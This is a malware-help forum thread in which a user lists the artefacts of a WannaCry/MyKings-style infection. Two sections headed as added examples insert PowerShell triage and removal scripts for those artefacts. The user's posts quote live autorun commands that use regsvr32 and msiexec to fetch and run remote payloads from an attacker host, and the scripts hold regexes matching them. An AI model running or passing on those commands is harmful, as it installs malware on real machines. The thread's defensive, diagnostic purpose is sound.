A massive virus attack including the notorious WannaCry virus


6 replies to this topic

#1 My-Dear-Friend

Posted 27 July 2017 - 02:20 AM

I do not know if this is the right place to post.
Yesterday my computer (Windows 7 HB x64 SP1) was subjected to a massive virus attack.
The attack was contained mostly by the COMODO HIPS and probably by some of my countermeasures, but I still need to figure out how the viruses got into my computer and whether all of the malware has been removed.

In chronological order:

- At 17:56:40 a file "mssecsvc.exe" was created in the folder "C:\Windows".
  Upon a COMODO HIPS alert I terminated and deleted the file.
  A VirusTotal scan revealed that the file is Trojan / WanaCry / WannaCryptor ransomware.
  After this the same file kept appearing in the same folder many times over several hours.
  Each time I deleted the file, and then after some minutes it reappeared.

- At 18:44:11 a file "c.bat" was created in the folder "C:\Windows\debug".
  Likewise, upon a HIPS alert I deleted the file.
  VirusTotal did not find the file malicious at all, but a Malwr scan revealed a lot of malicious activity.

- At 19:22:03 a file "ajtce.exe" was created in the folder "C:\Windows\Temp"
- At 19:22:35 a file "ocioq.exe" was created in the folder "C:\Windows\Temp"
   Both of these files were identified as Trojan Droppers.

By this time I had scanned my computer with Malwarebytes and BitDefender Adware Removal Tool, but they did not find any problems.

Next I found two new Auto Run entries:

    1) Name: start
    Command line: regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
    Location: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    Process Path: regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll

    2) Name: start1
    Command line: msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
    Product name: Windows Installer - Юникод (Russian for "Unicode")
    Location: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    Process Path: C:\Windows\system32\msiexec.exe

- At 20:48:10 a file "Fwasf.exe" was created in the folder "C:\"
- At 21:53:24 a file "huazhongdiguo.exe" was created in the folder "C:\"
   Both of these files were identified as Trojan Downloaders.

I deleted both Auto Run entries and downloaded the latest version of RogueKiller. The scan did not find any substantial problems.

I rebooted the computer and did the Smart Scan with COMODO Cleaning Essentials - again no problems were found.

The file "mssecsvc.exe" kept reappearing in the folder "C:\Windows". Its actions were blocked by COMODO HIPS, but I kept deleting it every time I found it.
Other than that the computer worked normally.

By this time I had found very suspicious activity by the SYSTEM process, namely it was trying to connect to other users' home computers in my ISP's network, among other places. The TCP connections were made from the ports 445 or 139 - characteristic of the WannaCry virus.

So it looked like some virus had hijacked my computer's SYSTEM process. Over a few hours, SYSTEM had downloaded about 108 MB of data to my computer and uploaded about 4.5 MB to somewhere on the Internet.

I blocked SYSTEM from connecting to the Internet with COMODO Firewall.

Since then no new viruses have appeared on my computer, so far at least, that I know of - there were no alerts.

I have been performing a complete scan with COMODO Cleaning Essentials, but it is taking too long, so I will put it on pause. So far it is at 50% and has found no problems at all.

How can I find out how all these viruses got into my computer and whether I have removed all of the malware?
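The artefacts listed in this post (Run-key values that launch regsvr32 with a remote .sct scriptlet through scrobj.dll or msiexec with a remote MSI, the SYSTEM process opening outbound connections on 445/139, and the dropped files in C:\Windows, C:\Windows\Temp and C:\) can be checked for without uploading any logs. The script below is an added example, not code from the original post or from any of the tools it mentions; it is read-only and assumes an elevated PowerShell 4.0 or later session (available on Windows 7 SP1 through WMF 4.0) on the suspect host. The paths, registry keys and command-line shapes come from the post; the function names and regular expressions are this example's own.

```powershell
# Added example, not code from the original post: a read-only triage pass over
# the artefacts described above, for an elevated PowerShell 4.0+ session on
# the suspect host. Paths, registry keys and command-line shapes are taken
# from the post; the function names and regexes are this example's own.

$RunKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
)

# Two shapes from the post: regsvr32 loading a remote .sct scriptlet through
# scrobj.dll, and msiexec silently installing a remote MSI.
$SuspiciousPatterns = @(
    'regsvr32.*/i:https?://.*scrobj\.dll',
    'msiexec(\.exe)?\s+/i\s+https?://'
)

function Find-SuspiciousRunEntries {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }      # provider metadata, not a value
            $cmd = [string]$prop.Value
            foreach ($pattern in $SuspiciousPatterns) {
                if ($cmd -match $pattern) {
                    [pscustomobject]@{ Key = $key; Name = $prop.Name; Command = $cmd }
                    break
                }
            }
        }
    }
}

function Find-SystemSmbConnections {
    # The post reports SYSTEM (PID 4) connecting out to 445/139. Listening
    # sockets on those ports are normal; established or half-open connections
    # owned by PID 4 toward other hosts are what the post describes.
    $smbPorts = 445, 139
    if (Get-Command Get-NetTCPConnection -ErrorAction SilentlyContinue) {
        Get-NetTCPConnection -OwningProcess 4 -ErrorAction SilentlyContinue |
            Where-Object { $smbPorts -contains $_.RemotePort -and $_.State -ne 'Listen' } |
            Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State
    } else {
        # Windows 7 has no Get-NetTCPConnection; parse netstat -ano instead.
        netstat -ano | ForEach-Object {
            if ($_ -match '^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+4\s*$' -and
                $smbPorts -contains [int]$Matches[4] -and $Matches[5] -ne 'LISTENING') {
                [pscustomobject]@{ Local  = "$($Matches[1]):$($Matches[2])"
                                   Remote = "$($Matches[3]):$($Matches[4])"
                                   State  = $Matches[5] }
            }
        }
    }
}

function Find-DroppedFiles {
    # Every file path the post names; hash anything still present so it can
    # be looked up again without re-uploading the sample.
    $paths = 'C:\Windows\mssecsvc.exe', 'C:\Windows\debug\c.bat',
             'C:\Windows\Temp\ajtce.exe', 'C:\Windows\Temp\ocioq.exe',
             'C:\Fwasf.exe', 'C:\huazhongdiguo.exe'
    foreach ($path in $paths) {
        if (Test-Path -LiteralPath $path) {
            Get-Item -LiteralPath $path |
                Select-Object FullName, Length, CreationTime,
                    @{ n = 'SHA256'; e = { (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash } }
        }
    }
}

'== Run-key entries launching remote scriptlets or MSIs =='
Find-SuspiciousRunEntries | Format-Table -AutoSize
'== Outbound SMB connections owned by SYSTEM (PID 4) =='
Find-SystemSmbConnections | Format-Table -AutoSize
'== Dropped files named in the post that are still present =='
Find-DroppedFiles | Format-Table -AutoSize
```

The regsvr32 pattern matters because the value in the post (`regsvr32 /u /s /i:http://... scrobj.dll`) runs a signed Microsoft binary that fetches and executes a remote scriptlet, which is why deleting the dropped executables alone does not stop the files from reappearing as long as the Run entry, or anything else that re-creates it, survives. The SHA256 hashes let you re-check a sample on VirusTotal by hash rather than uploading it.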
 




#2 boopme (Global Moderator)

Posted 27 July 2017 - 11:08 AM

Hi, could you repost this info with an FRST log from the GUIDE in a new topic... Start at step 6.

Please follow this Preparation Guide and post in a new topic.
Let me know if all went well.

#3 My-Dear-Friend (Topic Starter)

Posted 29 July 2017 - 01:48 AM

Hi, boopme. Thanks for the help. The tool that you recommended did a good job and helped me find some more viruses. I do not feel comfortable posting the logs, because that would violate my privacy and could possibly make me more vulnerable to future attacks.

Though I do appreciate any other help and suggestions.

I am still trying to figure it out. Now I have come to the conclusion that my computer is infected, and it looks like SYSTEM and svchost are hijacked. But no antivirus program that I have used so far is able to detect the main virus.

The summary of the attack so far:

2017.04.28  23:33:58   C:\qqss77889900.exe                                      Trojan.Downloader
2017.04.28  23:33:58   *\Temporary Internet Files\Content.IE5\a[1].exe          Trojan.Downloader
2017.04.30  00:20:25   C:\1.exe                                                 Trojan.BitCoinMiner
2017.04.30  00:20:25   *\Temporary Internet Files\Content.IE5\1[1].exe          Trojan.BitCoinMiner
2017.05.04  00:03:40   C:\1.exe                                                 Trojan.BitCoinMiner.Generic
2017.05.04  00:03:40   *\Temporary Internet Files\Content.IE5\1[2].exe          Trojan.BitCoinMiner.Generic
2017.07.26  07:47      fake BSOD
2017.07.26  09:44      fake BSOD
2017.07.26  17:56:40   C:\Windows\mssecsvc.exe                                  Ransom.WannaCrypt
2017.07.26  18:44:10   *\Temporary Internet Files\Content.IE5\ok[1].txt
2017.07.26  18:44:11   C:\Windows\debug\c.bat
2017.07.26  18:44:11   C:\Windows\System32\1.txt
2017.07.26  18:44:14   C:\Windows\System32\Tasks\Mysa
2017.07.26  19:22:03   C:\Windows\Temp\ajtce.exe                                Trojan.Dropper
2017.07.26  19:22:03   *\Temporary Internet Files\Content.IE5\fuсkex[1].exe     Trojan.Dropper
2017.07.26  19:22:35   C:\Windows\Temp\ocioq.exe                                Trojan.Dropper
2017.07.26  19:22:35   *\Temporary Internet Files\Content.IE5\fuсkex[2].exe     Trojan.Dropper
2017.07.26  20:48:10   C:\Fwasf.exe
2017.07.26  20:48:10   *\Temporary Internet Files\Content.IE5\445[1].exe
2017.07.26  20:48:49   *\Temporary Internet Files\Content.IE5\445[2].exe
2017.07.26  21:53:23   A new Windows user account created: "Huweishen-MySql"
2017.07.26  21:53:24   C:\huazhongdiguo.exe                                     Trojan.Downloader
2017.07.26  22:55:07   C:\Windows\System32\s
2017.07.26  ? - 23:16  C:\Windows\mssecsvc.exe                                  Ransom.WannaCrypt

2017.07.27  01:05      I blocked SYSTEM with the COMODO Firewall and the attack stopped.
---------------------------------------------------------
*C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

 

In addition, I found a WMI script embedded in the WMI database, fuсkyoumm2_consumer, and the two Auto Run entries. I have no idea when they were installed. All of the viruses mentioned above are now deactivated, except for the main virus, which I have not been able to find yet.


Edited by My-Dear-Friend, 29 July 2017 - 06:28 AM.
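The WMI event consumer mentioned in this post is a permanent event subscription stored in the WMI repository: a filter (a WQL trigger), a consumer (the command or script that runs) and a binding that joins them. It survives reboots, runs as SYSTEM and is not a file on disk, which is consistent with scanners reporting nothing while files keep coming back. The script below is an added example, not code from the original post or from any tool it names; it lists every live filter/consumer pair with its query and payload, shows the "Mysa" scheduled task and the local accounts from the timeline, and provides a removal routine for a confirmed consumer. It assumes an elevated PowerShell 3.0 or later session on the suspect host; the function names are this example's own.

```powershell
# Added example, not code from the original post. Enumerates WMI permanent
# event subscriptions (root\subscription), the "Mysa" scheduled task and the
# local accounts named in the timeline, and shows how to remove a consumer
# together with its bindings. Needs an elevated PowerShell 3.0+ session;
# function names are this example's own.

$Ns = 'root\subscription'

function Get-WmiPersistence {
    # A persistent subscription is three objects: an __EventFilter (WQL
    # trigger), an __EventConsumer (what runs) and a __FilterToConsumerBinding
    # joining them. Walking the bindings shows every live trigger/payload pair.
    $filters   = @(Get-WmiObject -Namespace $Ns -Class __EventFilter)
    $consumers = @(Get-WmiObject -Namespace $Ns -Class __EventConsumer)
    $bindings  = @(Get-WmiObject -Namespace $Ns -Class __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        # Reference paths look like  __EventFilter.Name="x"  and
        # CommandLineEventConsumer.Name="y"; pull out the Name values.
        $fName = ($b.Filter   -split 'Name=')[-1].Trim('"')
        $cName = ($b.Consumer -split 'Name=')[-1].Trim('"')
        $f = $filters   | Where-Object { $_.Name -eq $fName }
        $c = $consumers | Where-Object { $_.Name -eq $cName }
        # CommandLineEventConsumer carries a command line; ActiveScriptEventConsumer
        # carries embedded script text (the "WMI script" from the post).
        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        [pscustomobject]@{
            Filter   = $fName
            Query    = $f.Query
            Consumer = $cName
            Type     = $c.__CLASS
            Payload  = $payload
        }
    }
}

function Remove-WmiPersistence {
    param([Parameter(Mandatory = $true)][string]$ConsumerName)
    # Remove the bindings first (otherwise the consumer is still referenced),
    # then the consumer, then the filters those bindings pointed at.
    $orphanFilters = @()
    Get-WmiObject -Namespace $Ns -Class __FilterToConsumerBinding |
        Where-Object { ($_.Consumer -split 'Name=')[-1].Trim('"') -eq $ConsumerName } |
        ForEach-Object {
            $orphanFilters += ($_.Filter -split 'Name=')[-1].Trim('"')
            Remove-WmiObject -InputObject $_
        }
    Get-WmiObject -Namespace $Ns -Class __EventConsumer |
        Where-Object { $_.Name -eq $ConsumerName } |
        ForEach-Object { Remove-WmiObject -InputObject $_ }
    Get-WmiObject -Namespace $Ns -Class __EventFilter |
        Where-Object { $orphanFilters -contains $_.Name } |
        ForEach-Object { Remove-WmiObject -InputObject $_ }
}

function Get-TaskAndAccountArtefacts {
    # The task and account from the timeline. schtasks.exe works on Windows 7,
    # where the Get-ScheduledTask cmdlet does not exist.
    schtasks /query /tn Mysa /fo LIST /v 2>$null
    Get-WmiObject -Class Win32_UserAccount -Filter 'LocalAccount = True' |
        Select-Object Name, SID, Disabled, PasswordRequired
}

'== WMI permanent event subscriptions =='
Get-WmiPersistence | Format-List
'== Scheduled task "Mysa" and local accounts =='
Get-TaskAndAccountArtefacts
# Once the consumer name is confirmed in the listing above:
#   Remove-WmiPersistence -ConsumerName '<consumer name from the listing>'
```

Read the Query and Payload columns before removing anything: a filter that fires on a timer (a WQL query against __InstanceModificationEvent on Win32_LocalTime or Win32_PerfFormattedData) with a consumer that runs a command line fetching content over HTTP is the shape that re-creates dropped files at intervals. Run the removal only after the Run entries and scheduled task are gone as well, or the subscription can simply be put back by whichever piece fires first.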


#4 Aura (Malware Response Team)

Posted 29 July 2017 - 01:14 PM

Hi My-Dear-Friend :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name; it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply right after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system. I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here; better safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of it as fast as we can, before it makes unknown changes to the system. This being said, I would appreciate it if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall it right now. You don't have to tell me if you indeed had some or not; I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate it if you let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate it if you were to stay with me until the end, which means until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
  • This being said, I have a full-time job, so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread.
This being said, it's time to clean up some malware, so let's get started, shall we? :)

In order to properly assist you with the clean-up, you'll need to run the tools and provide the logs asked for. If you do not feel comfortable providing them publicly, you are always free to PM them to me. You can start by following the instructions in the Preparation Guide boopme linked, and provide me with the FRST.txt and Addition.txt logs from FRST.

Edited by Aura, 29 July 2017 - 01:14 PM.

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 My-Dear-Friend (Topic Starter)

Posted 30 July 2017 - 02:36 AM

Hi, Yoan. Thank you for your help. I do appreciate it. Unfortunately, it does not seem to work for me, because I feel uncomfortable uploading the logs that could both violate my privacy and make me vulnerable to future attacks. And since you are saying that you are closing this thread, that does not seem to leave me any options but to look for help elsewhere.

But you guys are great and are doing very important work here. It just unfortunately does not seem to work for me.



#6 Aura (Malware Response Team)

Posted 30 July 2017 - 09:27 AM

"Unfortunately, it does not seem to work for me, because I feel uncomfortable uploading the logs that could both violate my privacy and make me vulnerable to future attacks."

These logs won't make you vulnerable to any attack. Also, you are free to share these logs privately with me, meaning that I'll be the only one able to access them.

"And since you are saying that you are closing this thread"

Where did I say that?

"that does not seem to leave me any options but to look for help elsewhere."

Just know that every malware removal forum works with the same tools and logs I'm asking you to use here. So if it doesn't work for you here, it probably won't work for you on any other forum doing the same kind of malware removal assistance as we do here.

Edited by Aura, 30 July 2017 - 09:28 AM.



#7 My-Dear-Friend (Topic Starter)

Posted 30 July 2017 - 04:03 PM

Hi, Yoan. Thanks again for your help.

I found some more revealing information about the attack, so I could keep updating this thread with my progress as I keep looking for the virus.

And if you have the time and desire, maybe you could provide me with some hints from time to time as to what I could check and where I could look.

And if you do not want to, then I surely cannot demand that you spend your time helping me; I would not blame you if you won't.

Or will you close this thread if I do not provide you with the logs? And you probably will not allow anybody else to help me?

I am just wondering if I misread your message, because I am constantly coming across people who make some rules and then hurt others for not obeying their rules.

I do not mean you, I mean some other people.





